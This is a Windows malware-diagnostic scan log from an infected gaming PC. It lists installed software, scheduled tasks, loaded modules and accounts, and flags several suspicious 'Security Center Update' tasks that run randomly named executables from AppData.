Origin (HKLM-x32\...\Origin) (Version: 9.3.1.4482 - Electronic Arts, Inc.)
PA Mod Manager 3.4.0 (HKLM-x32\...\PA Mod Manager) (Version: 3.4.0 - Raevn)
paint.net (HKLM\...\{F509C1F4-0029-49F9-B145-A4C4E8DF481A}) (Version: 4.0.3 - dotPDN LLC)
Painter 13 - Contentx64 (Version: 13.0 - Corel Corporation) Hidden
Painter 13 - Core (Version: 13.0 - Corel Corporation) Hidden
Painter 13 - Corex64 (Version: 13.0 - Corel Corporation) Hidden
Painter 13 - EN (Version: 13.0 - Corel Corporation) Hidden
Painter 13 - Setup Files (Version: 13.0 - Corel Corporation) Hidden
PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version:  - OVERKILL - a Starbreeze Studio.)
PAYDAY: The Heist (HKLM-x32\...\Steam App 24240) (Version:  - OVERKILL Software)
Photo Common (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Photo Gallery (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Plague Inc Evolved (HKLM-x32\...\Plague Inc Evolved_is1) (Version: 0.7.5.1 - Decepticon)
PlanetSide 2 (HKCU\...\SOE-PlanetSide 2) (Version:  - Sony Online Entertainment)
PlanetSide 2 (HKLM-x32\...\Steam App 218230) (Version:  - Sony Online Entertainment)
Play withSIX (HKLM-x32\...\{D7F3EEAD-183C-47DE-BDC5-593539573F97}) (Version: 1.30.0476 - SIX Networks)
Portal 2 (HKLM-x32\...\Steam App 620) (Version:  - Valve)
Portal 2 Authoring Tools - Beta (HKLM-x32\...\Steam App 629) (Version:  - Valve)
Portal 2 Publishing Tool (HKLM-x32\...\Steam App 644) (Version:  - )
Prerequisite installer (x32 Version: 12.0.0002 - Nero AG) Hidden
Process Hacker 2.33 (r5590) (HKLM\...\Process_Hacker2_is1) (Version: 2.33.0.5590 - wj32)
Project Zomboid (HKLM-x32\...\Steam App 108600) (Version:  - The Indie Stone)
Psychonauts (HKLM-x32\...\Steam App 3830) (Version:  - Double Fine Productions)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
Quake Live Mozilla Plugin (HKLM-x32\...\{FA66CFD7-0977-4C45-AACD-A8BB994B1A05}) (Version: 1.0.520 - id Software)
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Rainmeter (HKLM-x32\...\Rainmeter) (Version: 3.1 beta r2280 - )
Razer Comms (HKLM-x32\...\Razer Comms) (Version: 2.0 - Razer Inc.)
Razer Game Booster (HKLM-x32\...\Razer Game Booster_is1) (Version: 4.0.68.0 - Razer Inc.)
Razer Surround (HKLM-x32\...\Razer Surround) (Version: 1.05.10 - Razer Inc.)
Razer Synapse 2.0 (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 1.18.15.20888 - Razer Inc.)
RealDownloader (x32 Version: 17.0.12 - RealNetworks, Inc.) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer Cloud (HKLM-x32\...\RealPlayer 17.0) (Version: 17.0.12 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.2.612.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6657 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Red Faction: Guerrilla  (HKLM-x32\...\Steam App 20500) (Version:  - Volition)
ROBLOX Player for RaRWolf (HKCU\...\{373B1718-8CC5-4567-8EE2-9033AD08A680}) (Version:  - ROBLOX Corporation)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.0.6 - Rockstar Games)
Rodina (HKLM-x32\...\{0B7E56F5-D39D-4A41-B3A0-D60886044041}) (Version: 1.1.0 - Elliptic Games)
Roleplaying City Map Generator (HKLM-x32\...\{3B585A53-CC41-4969-A7CB-F0E5D34ACA08}) (Version: 4.5.0.0 - )
RollerCoaster Tycoon 3: Platinum! (HKLM-x32\...\Steam App 2700) (Version:  - Frontier)
RPG Maker VX Ace (HKLM-x32\...\{835D562C-B72C-461D-A9C3-B8206B66E85A}) (Version: 1.01 - RPG MAKER)
RPG MAKER VX Ace RTP (HKLM-x32\...\RPGVXAce_RTP_is1) (Version: 1.00 - Enterbrain)
Running With Rifles 0.98.4 (HKLM-x32\...\Running With Rifles 0.98.4) (Version: 0.98.4 - Игры на Cat-A-Cat.NET)
RUNNING WITH RIFLES Demo version 0.76 (HKLM-x32\...\{5ABD42BC-4DDD-48C7-9951-48B31F27EC39}_is1) (Version: 0.76 - Modulaatio Games)
Running with rifles version 0.95 (HKLM-x32\...\{E2948988-2C6C-4070-BC8B-A1D77FE97D09}_is1) (Version: 0.95 - Modulaatio Games)
Rust (HKLM-x32\...\{E3948799-9E75-4704-8E36-071C43A2750C}) (Version: 19.12.2013 - Facepunch)
Saints Row 2 (HKLM-x32\...\Steam App 9480) (Version:  - Volition)
Sci-Fi 2 Sound Pack (HKLM-x32\...\{E7E76513-335F-4995-86CF-A85B77D8D975}) (Version: 1.3.0 - Screaming Bee)
Sci-Fi Sound Pack (HKLM-x32\...\{D13F2D95-1CE0-4147-846F-89ECB2E9A5CD}) (Version: 1.1.0 - Screaming Bee)
SDK Debuggers (x32 Version: 8.100.26629 - Microsoft Corporation) Hidden
Search Protection (HKCU\...\Search Protection) (Version: 7.5.0.1 - Spigot, Inc.) <==== ATTENTION
SHIELD Streaming (Version: 3.1.100 - NVIDIA Corporation) Hidden
Sid Meier's Civilization 5 (HKLM-x32\...\Sid Meier's Civilization 5_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, Panky)
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version:  - 2K Games, Inc.)
Six Updater (HKLM-x32\...\{2D8CED57-CCDB-4D86-9087-3BBCAE8F8F22}) (Version: 2.09.7038 - Six Projects)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.3.16540.9015 - Microsoft Corporation)
Skype™ 6.21 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.21.104 - Skype Technologies S.A.)
Sleeping Dogs™ (HKLM-x32\...\Steam App 202170) (Version:  - United Front Games)
Source SDK (HKLM-x32\...\Steam App 211) (Version:  - Valve)
Source SDK Base 2006 (HKLM-x32\...\Steam App 215) (Version:  - Valve)
Source SDK Base 2007 (HKLM-x32\...\Steam App 218) (Version:  - Valve)
Space Engineers (HKLM-x32\...\Steam App 244850) (Version:  - )
Space Engineers Toolbox (HKLM-x32\...\{60079798-AEE7-48FD-B642-810D3D1B2C26}) (Version: 01.039.010.1 - Mid-Space Productions)
Split/Second (HKLM-x32\...\{28526951-55EF-4901-A0CA-B9AC966D1DD1}) (Version: 1.00.0000 - Disney Interactive Studios)
Spooky Sounds (HKLM-x32\...\{D813EF9B-69CF-4996-893C-B400AE7292FA}) (Version: 2.1.0 - Screaming Bee)
Spore (HKLM-x32\...\Steam App 17390) (Version:  - Maxis)
Square Enix Secure Launcher (HKCU\...\Square Enix Secure Launcher) (Version: 1.0.0.108 - Square Enix)
Stacking (HKLM-x32\...\Steam App 115110) (Version:  - )
Star Wars Battlefront (HKLM-x32\...\{C79CB9C7-10A4-4814-8402-F574672C2192}) (Version: 1.0 - LucasArts)
Star Wars Battlefront II (HKLM-x32\...\{3D374523-CFDE-461A-827E-2A102E2AB365}) (Version: 1.0 - LucasArts)
Star wars Battlefront II version 1.3 (HKLM-x32\...\{2EF34761-F147-4984-8AF1-BB9F8DA76CDD}_is1) (Version: 1.3 - )
Star Wars Empire at War (HKLM-x32\...\{99AE7207-8612-4DBA-A8F8-BAE5C633390D}) (Version: 1.0 - LucasArts)
Starbound (HKLM-x32\...\Steam App 211820) (Version:  - )
StarForge Alpha (HKLM-x32\...\Steam App 227680) (Version:  - )
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Stykz for Windows 1.0.2 (HKLM-x32\...\{7E44C354-10A8-4214-9C56-F3F00775E415}_is1) (Version: 1.0.2 - Sons of Thunder Software, Inc.)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
System Requirements Lab CYRI (HKLM-x32\...\{F3FCB08B-E752-444D-86A0-0634A4F3B23D}) (Version: 6.0.8.0 - Husdawg, LLC)
Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version:  - Valve)
TeamSpeak 2 RC2 (HKLM-x32\...\Teamspeak 2 RC2_is1) (Version: 2.0.32.60 - Dominating Bytes Design)
TeamSpeak 2 Server RC2 (HKLM-x32\...\TeamSpeak 2 Server_is1) (Version: 2.0.23.19 - TeamSpeak Systems)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.13.1 - TeamSpeak Systems GmbH)
Terraria version 1.2.4.1 (HKLM-x32\...\{1520E069-19A9-4B01-BA5D-87B67D56F55D}_is1) (Version: 1.2.4.1 - )
TES Construction Set (HKLM-x32\...\{DB3C800B-081B-4146-B4E3-EFB5B77AA913}) (Version:  - )
The Ship Single Player (HKLM-x32\...\Steam App 2420) (Version:  - Outerlight Ltd.)
The Showdown Effect (HKLM-x32\...\Steam App 204080) (Version:  - Arrowhead Game Studios)
The Sims™ 3 (HKLM-x32\...\{C05D8CDB-417D-4335-A38C-A0659EDFD6B8}) (Version: 1.67.2 - Electronic Arts)
The Sims™ 3 Create a World Tool - Beta (HKLM-x32\...\{65761BAE-11E8-48FE-B30F-1F01011AB906}) (Version: 1.19.6 - Electronic Arts)
The Sims™ 3 High-End Loft Stuff (HKLM-x32\...\{71828142-5A24-4BD0-97E7-976DA08CE6CF}) (Version: 3.0.38 - Electronic Arts)
The Sims™ 3 Late Night (HKLM-x32\...\{45057FCE-5784-48BE-8176-D9D00AF56C3C}) (Version: 6.5.1 - Electronic Arts)
The Witcher Enhanced Edition (HKLM-x32\...\{F138762F-5A1F-4CF0-A5E1-1588EF6088A4}) (Version: 1.00.0000 - CD Projekt Red)
Tiny and Big: Grandpa's Leftovers (HKLM-x32\...\Steam App 205910) (Version:  - Black Pants Game Studio)
Tom Clancy's Splinter Cell Chaos Theory (HKLM-x32\...\{888DD888-82BE-4D85-BCB2-2E042CD3E844}) (Version: 1.05.157 - Ubisoft)
Tom Clancy's Splinter Cell Conviction (HKLM-x32\...\{6D8DDB4A-C263-40DE-BA16-AFDAD159D59A}) (Version: 1.00.000 - Ubisoft)
Tom Clancy's Splinter Cell® Blacklist™ (HKLM-x32\...\{A6356F2F-D3E1-4D83-9AA2-72871DD0C298}) (Version: 1.00.1000 - Ubisoft)
Tomb Raider III (HKLM-x32\...\Tomb Raider III) (Version:  - )
Trials Evolution Gold Edition (HKLM-x32\...\InstallShield_{07D857B8-C956-401D-BC8F-EDA8459AF037}) (Version: 1.0.0.5 - Ubisoft)
Trials Evolution Gold Edition (x32 Version: 1.0.0.5 - Ubisoft) Hidden
TVPaint Animation 10.0 Professional Edition (32bits) (DEMO) (remove only) (HKLM-x32\...\TVP Animation 10 Pro DEMO) (Version:  - )
Ubisoft Game Launcher (HKLM-x32\...\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
Unity Web Player (HKCU\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Unreal Development Kit: 2012-07 (HKLM\...\UDK-3d519be7-e7af-4b69-98ba-bbe1e7c83c74) (Version:  - Epic Games, Inc.)
Unreal Development Kit: 2012-07 (HKLM\...\UDK-8d7ec19c-13f9-47d2-a017-ad26215fc52e) (Version:  - Epic Games, Inc.)
Unreal Development Kit: 2014-02 (HKLM\...\UDK-2b78b7b2-e686-42c1-8f7c-2fe04f20f2ab) (Version:  - Epic Games, Inc.)
Unturned (HKLM-x32\...\Steam App 304930) (Version:  - Nelson Sexton)
UpdateService (x32 Version: 1.0.0 - RealNetworks, Inc.) Hidden
Uplay (HKLM-x32\...\Uplay) (Version: 3.0 - Ubisoft)
Uplink (HKLM-x32\...\Steam App 1510) (Version:  - Introversion Software)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Wacom Tablet (HKLM\...\Wacom Tablet Driver) (Version: 6.3.8-4 - Wacom Technology Corp.)
Warhammer 40,000: Dawn of War - Game of the Year Edition (HKLM-x32\...\Steam App 4570) (Version:  - Relic)
WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
Why ASUS PC (HKLM-x32\...\{5648F9D9-299E-408C-AC1F-59DC75894A1F}) (Version: 1.00.02 - ASUSTeK Computer Inc.)
WinCDEmu (HKLM-x32\...\WinCDEmu) (Version: 3.6 - Bazis)
Windows Frotz (HKLM-x32\...\WindowsFrotz) (Version:  - )
Windows Live (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Communications Platform (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3503.0728 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Software Development Kit EULA (x32 Version: 8.100.25984 - Microsoft Corporations) Hidden
Windows Software Development Kit for Windows 8.1 (HKLM-x32\...\{25981ccc-475f-4b68-850b-89d3fc287ff1}) (Version: 8.100.26695 - Microsoft Corporation)
WinRAR 4.20 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
WorldPainter 1.7.1 (HKLM-x32\...\4144-4862-0472-7103) (Version: 1.7.1 - pepsoft.org)
Wrye Bash (HKLM-x32\...\Wrye Bash) (Version: 3.0.4.4 - Wrye & Wrye Bash Development Team)
XCOM: Enemy Within (HKLM-x32\...\WENPTUVuZW15V2l0aGlu_is1) (Version: 1 - )
Xvid Video Codec (HKLM-x32\...\Xvid Video Codec 1.3.2) (Version: 1.3.3 - Xvid Team)
Zombie Panic Source (HKLM-x32\...\Steam App 17500) (Version:  - Zombie Panic Team)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
 
==================== Restore Points  =========================
 
20-10-2014 05:46:44 Scheduled Checkpoint
22-10-2014 21:46:15 Installed RPG Maker VX Ace
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {05E6FA5F-1C8C-4730-B0C9-BB8640B82410} - \Security Center Update - 467669557 No Task File <==== ATTENTION
Task: {0EF4A154-FEBC-487D-A6B4-912C12223112} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-20] (Google Inc.)
Task: {12DD2CA7-744A-4F72-A0A0-BC680985D325} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1557230296-4363482-4078292831-1002 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2014-07-24] (RealNetworks, Inc.)
Task: {1AAFF332-5C62-4558-9991-DAA649C4C9C5} - System32\Tasks\Microsoft\Windows\Sysmain\WsSwapAssessmentTask => Rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask
Task: {20D47698-8A8D-4AB4-9A50-B138F5BE18A4} - System32\Tasks\Security Center Update - 1195299623 => C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe [2014-10-05] () <==== ATTENTION
Task: {23A5D8BE-9196-40EB-BD89-794398B2B073} - System32\Tasks\Microsoft\Windows\WS\WSRefreshBannedAppsListTask => Rundll32.exe WSClient.dll,RefreshBannedAppsList
Task: {312699F1-CA91-4A62-9438-A029F13EDF91} - System32\Tasks\Security Center Update - 2903558157 => C:\Users\RaRWolf\AppData\Roaming\Adtuguka\hozuupw.exe <==== ATTENTION
Task: {3C1DF4E4-F642-455C-B31F-F3CFE7874AB6} - \Security Center Update - 2617606942 No Task File <==== ATTENTION
Task: {4462CF66-3BFB-4F46-8DAA-EB8E5BAD58CB} - System32\Tasks\{AE7C3D4A-D84F-FFE7-69BB-457B9C83DCAC} => C:\Users\RaRWolf\AppData\Roaming\qxigf.dll [2014-10-10] () <==== ATTENTION
Task: {52701CBC-326F-4144-8460-9112025E8F42} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-09] (Adobe Systems Incorporated)
Task: {5F57C186-31CD-42F4-ACD6-3D3215E5F1A0} - \BrowserSafeguard Update Task No Task File <==== ATTENTION
Task: {6A79F1FF-3DD9-47D1-AEC9-C68EE88BE996} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1557230296-4363482-4078292831-1002 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2014-07-24] (RealNetworks, Inc.)
Task: {79C28478-DF06-4C6F-9F86-5748287A02E4} - System32\Tasks\Security Center Update - 1765064875 => C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Hewavy\olbuhi.exe <==== ATTENTION
Task: {7C755F3D-C1EB-4B49-9434-793B6F26B785} - System32\Tasks\Security Center Update - 3029572363 => C:\Users\RaRWolf\AppData\Roaming\Opfocyf\ebkawau.exe <==== ATTENTION
Task: {81E2736B-9DF6-4525-845F-19F64C31F0F9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-20] (Google Inc.)
Task: {93039A7B-8D28-42CE-9895-9E7E80712996} - System32\Tasks\Security Center Update - 3324824421 => C:\Users\RaRWolf\AppData\Roaming\Qynygare\soacm.exe <==== ATTENTION
Task: {9EAC1F9E-8030-4FA0-9943-54C3E87D7310} - System32\Tasks\ASUS\ASUS AI Suite II Execute => C:\Program Files (x86)\ASUS\AI Suite II\AsRoutineController.exe [2012-03-13] (ASUSTeK Computer Inc.)
Task: {A72208BF-7A49-4FB8-B684-252375F3443A} - System32\Tasks\Microsoft\Windows\WS\License Validation => Rundll32.exe WSClient.dll,WSpTLR licensing
Task: {C0B1B98F-E445-4E29-BEE8-FF0C7288A786} - System32\Tasks\Security Center Update - 3510430382 => C:\Users\RaRWolf\AppData\Roaming\Myrycaop\exbuyvz.exe [2013-10-23] () <==== ATTENTION
Task: {C4B13F0C-D6C8-4368-A7BA-2C2DFE7ADF7E} - \Security Center Update - 2602486151 No Task File <==== ATTENTION
Task: {C6A88F2D-53D2-4805-9D69-443738A1847C} - System32\Tasks\Microsoft\Windows\ApplicationData\CleanupTemporaryState => Rundll32.exe Windows.Storage.ApplicationData.dll,CleanupTemporaryState
Task: {D43C5E37-B7AD-445F-8415-C2C1DD8BF3A1} - System32\Tasks\Security Center Update - 258622643 => C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Axutwu\osama.exe <==== ATTENTION
Task: {E34A9BB2-F45E-455D-919E-0C128F63BF19} - System32\Tasks\ASUS\ASUS Dr.Net Execute => C:\Program Files (x86)\ASUS\AI Suite II\Dr.Net\AsDrNotify.exe [2012-04-30] (ASUSTeK Computer Inc.)
Task: {E35650CE-6560-457C-9313-A69CE343EEC5} - System32\Tasks\Security Center Update - 3847798286 => C:\Users\RaRWolf\AppData\Roaming\Xyasocki\dugit.exe <==== ATTENTION
Task: {EBF06DEC-4228-4813-AC0C-62821AE4E330} - System32\Tasks\Microsoft\Windows\Application Experience\StartupAppTask => Rundll32.exe Startupscan.dll,SusRunTask
Task: {F5166EA7-D58B-459C-B0E4-B28084AF2299} - System32\Tasks\AdobeAAMUpdater-1.0-Shoobledooble-RaRWolf => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-04-04] (Adobe Systems Incorporated)
Task: {F5F52209-55E5-40EC-8B34-A8140C33E1E3} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-09-26] (Piriform Ltd)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Security Center Update - 1195299623.job => C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 1765064875.job => C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Hewavy\olbuhi.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 258622643.job => C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Axutwu\osama.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 2903558157.job => C:\Users\RaRWolf\AppData\Roaming\Adtuguka\hozuupw.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 3029572363.job => C:\Users\RaRWolf\AppData\Roaming\Opfocyf\ebkawau.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 3324824421.job => C:\Users\RaRWolf\AppData\Roaming\Qynygare\soacm.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 3510430382.job => C:\Users\RaRWolf\AppData\Roaming\Myrycaop\exbuyvz.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 3847798286.job => C:\Users\RaRWolf\AppData\Roaming\Xyasocki\dugit.exe <==== ATTENTION
 
==================== Loaded Modules (whitelisted) =============
 
2012-09-14 05:05 - 2012-06-01 05:42 - 00920736 _____ () C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe
2013-01-12 13:00 - 2014-06-30 11:32 - 00076152 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2013-12-16 23:52 - 2014-05-19 21:25 - 00116568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2014-06-27 00:17 - 2014-04-21 18:30 - 01356568 _____ () C:\Program Files\Tablet\Wacom\libxml2.dll
2012-06-18 11:24 - 2012-06-18 11:24 - 00222720 _____ () C:\Program Files (x86)\Notepad++\NppShell_05.dll
2014-10-23 17:04 - 2014-10-23 17:06 - 19114072 _____ () C:\Users\RaRWolf\Downloads\RogueKillerX64.exe
2014-10-05 07:09 - 2014-10-05 07:09 - 00306301 _____ () C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
2013-01-28 17:08 - 2013-01-28 17:08 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2013-01-28 17:08 - 2013-01-28 17:08 - 01242512 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2012-09-14 05:05 - 2014-10-19 21:16 - 00024576 _____ () C:\Program Files (x86)\ASUS\AXSP\1.00.19\PEbiosinterface32.dll
2012-09-14 05:05 - 2010-06-28 22:58 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.00.19\ATKEX.dll
2014-10-22 19:42 - 2014-10-22 19:42 - 00883712 _____ () C:\Users\RaRWolf\AppData\Local\Ecvtion\EP0NXFR1.DLL
2014-10-22 19:40 - 2014-10-22 19:40 - 00915456 _____ () C:\Users\RaRWolf\AppData\Local\Alldworks\AdobeScCore.dll
2014-10-18 17:10 - 2014-10-09 22:03 - 01042760 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\libglesv2.dll
2014-10-18 17:09 - 2014-10-09 22:03 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\libegl.dll
2014-10-18 17:10 - 2014-10-09 22:04 - 08910664 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\pdf.dll
2014-10-18 17:09 - 2014-10-09 22:03 - 01681224 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\ffmpegsumo.dll
2014-10-08 21:59 - 2014-10-08 22:00 - 00505344 _____ () C:\Music\AIMP3\Sqlite3.dll
2014-10-08 22:00 - 2014-10-08 22:00 - 00218112 _____ () C:\Music\AIMP3\libsoxr.dll
2014-10-08 22:00 - 2014-10-08 22:00 - 00220672 _____ () C:\Music\AIMP3\Modules\MACDll.dll
2014-10-08 22:00 - 2014-10-08 22:00 - 00294400 _____ () C:\Music\AIMP3\Modules\libFLAC.dll
2014-10-08 22:00 - 2014-10-08 22:00 - 01733120 _____ () C:\Music\AIMP3\Modules\aimp_libvorbis.dll
2014-10-08 21:59 - 2014-10-08 22:00 - 00072136 _____ () C:\Music\AIMP3\Plugins\aimp_lastfm.dll
2014-10-08 21:59 - 2014-10-08 22:00 - 00026624 _____ () C:\Music\AIMP3\Plugins\Aorta.svp
2014-10-08 21:59 - 2014-10-08 22:00 - 00237568 _____ () C:\Music\AIMP3\Plugins\OptimFROG.dll
2014-10-08 21:59 - 2014-10-08 22:00 - 00141768 _____ () C:\Music\AIMP3\Plugins\PandemicAnalogMeter.dll
2014-10-18 17:10 - 2014-10-09 22:04 - 14902600 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\PepperFlash\pepflashplayer.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 01171456 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 00442368 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2013-03-12 17:10 - 2014-10-01 19:16 - 00774656 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2014-05-21 17:41 - 2014-10-21 15:22 - 02226880 _____ () C:\Program Files (x86)\Steam\video.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 00403968 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2012-12-26 16:38 - 2014-10-21 15:22 - 00682176 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2012-12-26 16:38 - 2014-09-04 19:29 - 34589376 _____ () C:\Program Files (x86)\Steam\bin\libcef.dll
2014-08-14 20:06 - 2014-09-04 19:29 - 00837824 _____ () C:\Program Files (x86)\Steam\bin\ffmpegsumo.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\Windows\system32\Drivers\fsthvckq.sys:changelist
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "amd_dc_opt"
HKLM\...\StartupApproved\Run32: => "Razer Synapse"
HKCU\...\StartupApproved\Run: => "Skype"
HKCU\...\StartupApproved\Run: => "whatpulse"
HKCU\...\StartupApproved\Run: => "uTorrent"
HKCU\...\StartupApproved\Run: => "DAEMON Tools Lite"
HKCU\...\StartupApproved\Run: => "Desura"
HKCU\...\StartupApproved\Run: => "MurGee.com Auto Clicker"
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-1557230296-4363482-4078292831-500 - Administrator - Disabled)
ASPNET (S-1-5-21-1557230296-4363482-4078292831-1005 - Limited - Enabled)
Guest (S-1-5-21-1557230296-4363482-4078292831-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1557230296-4363482-4078292831-1004 - Limited - Enabled)
RaRWolf (S-1-5-21-1557230296-4363482-4078292831-1002 - Administrator - Enabled) => C:\Users\RaRWolf
 
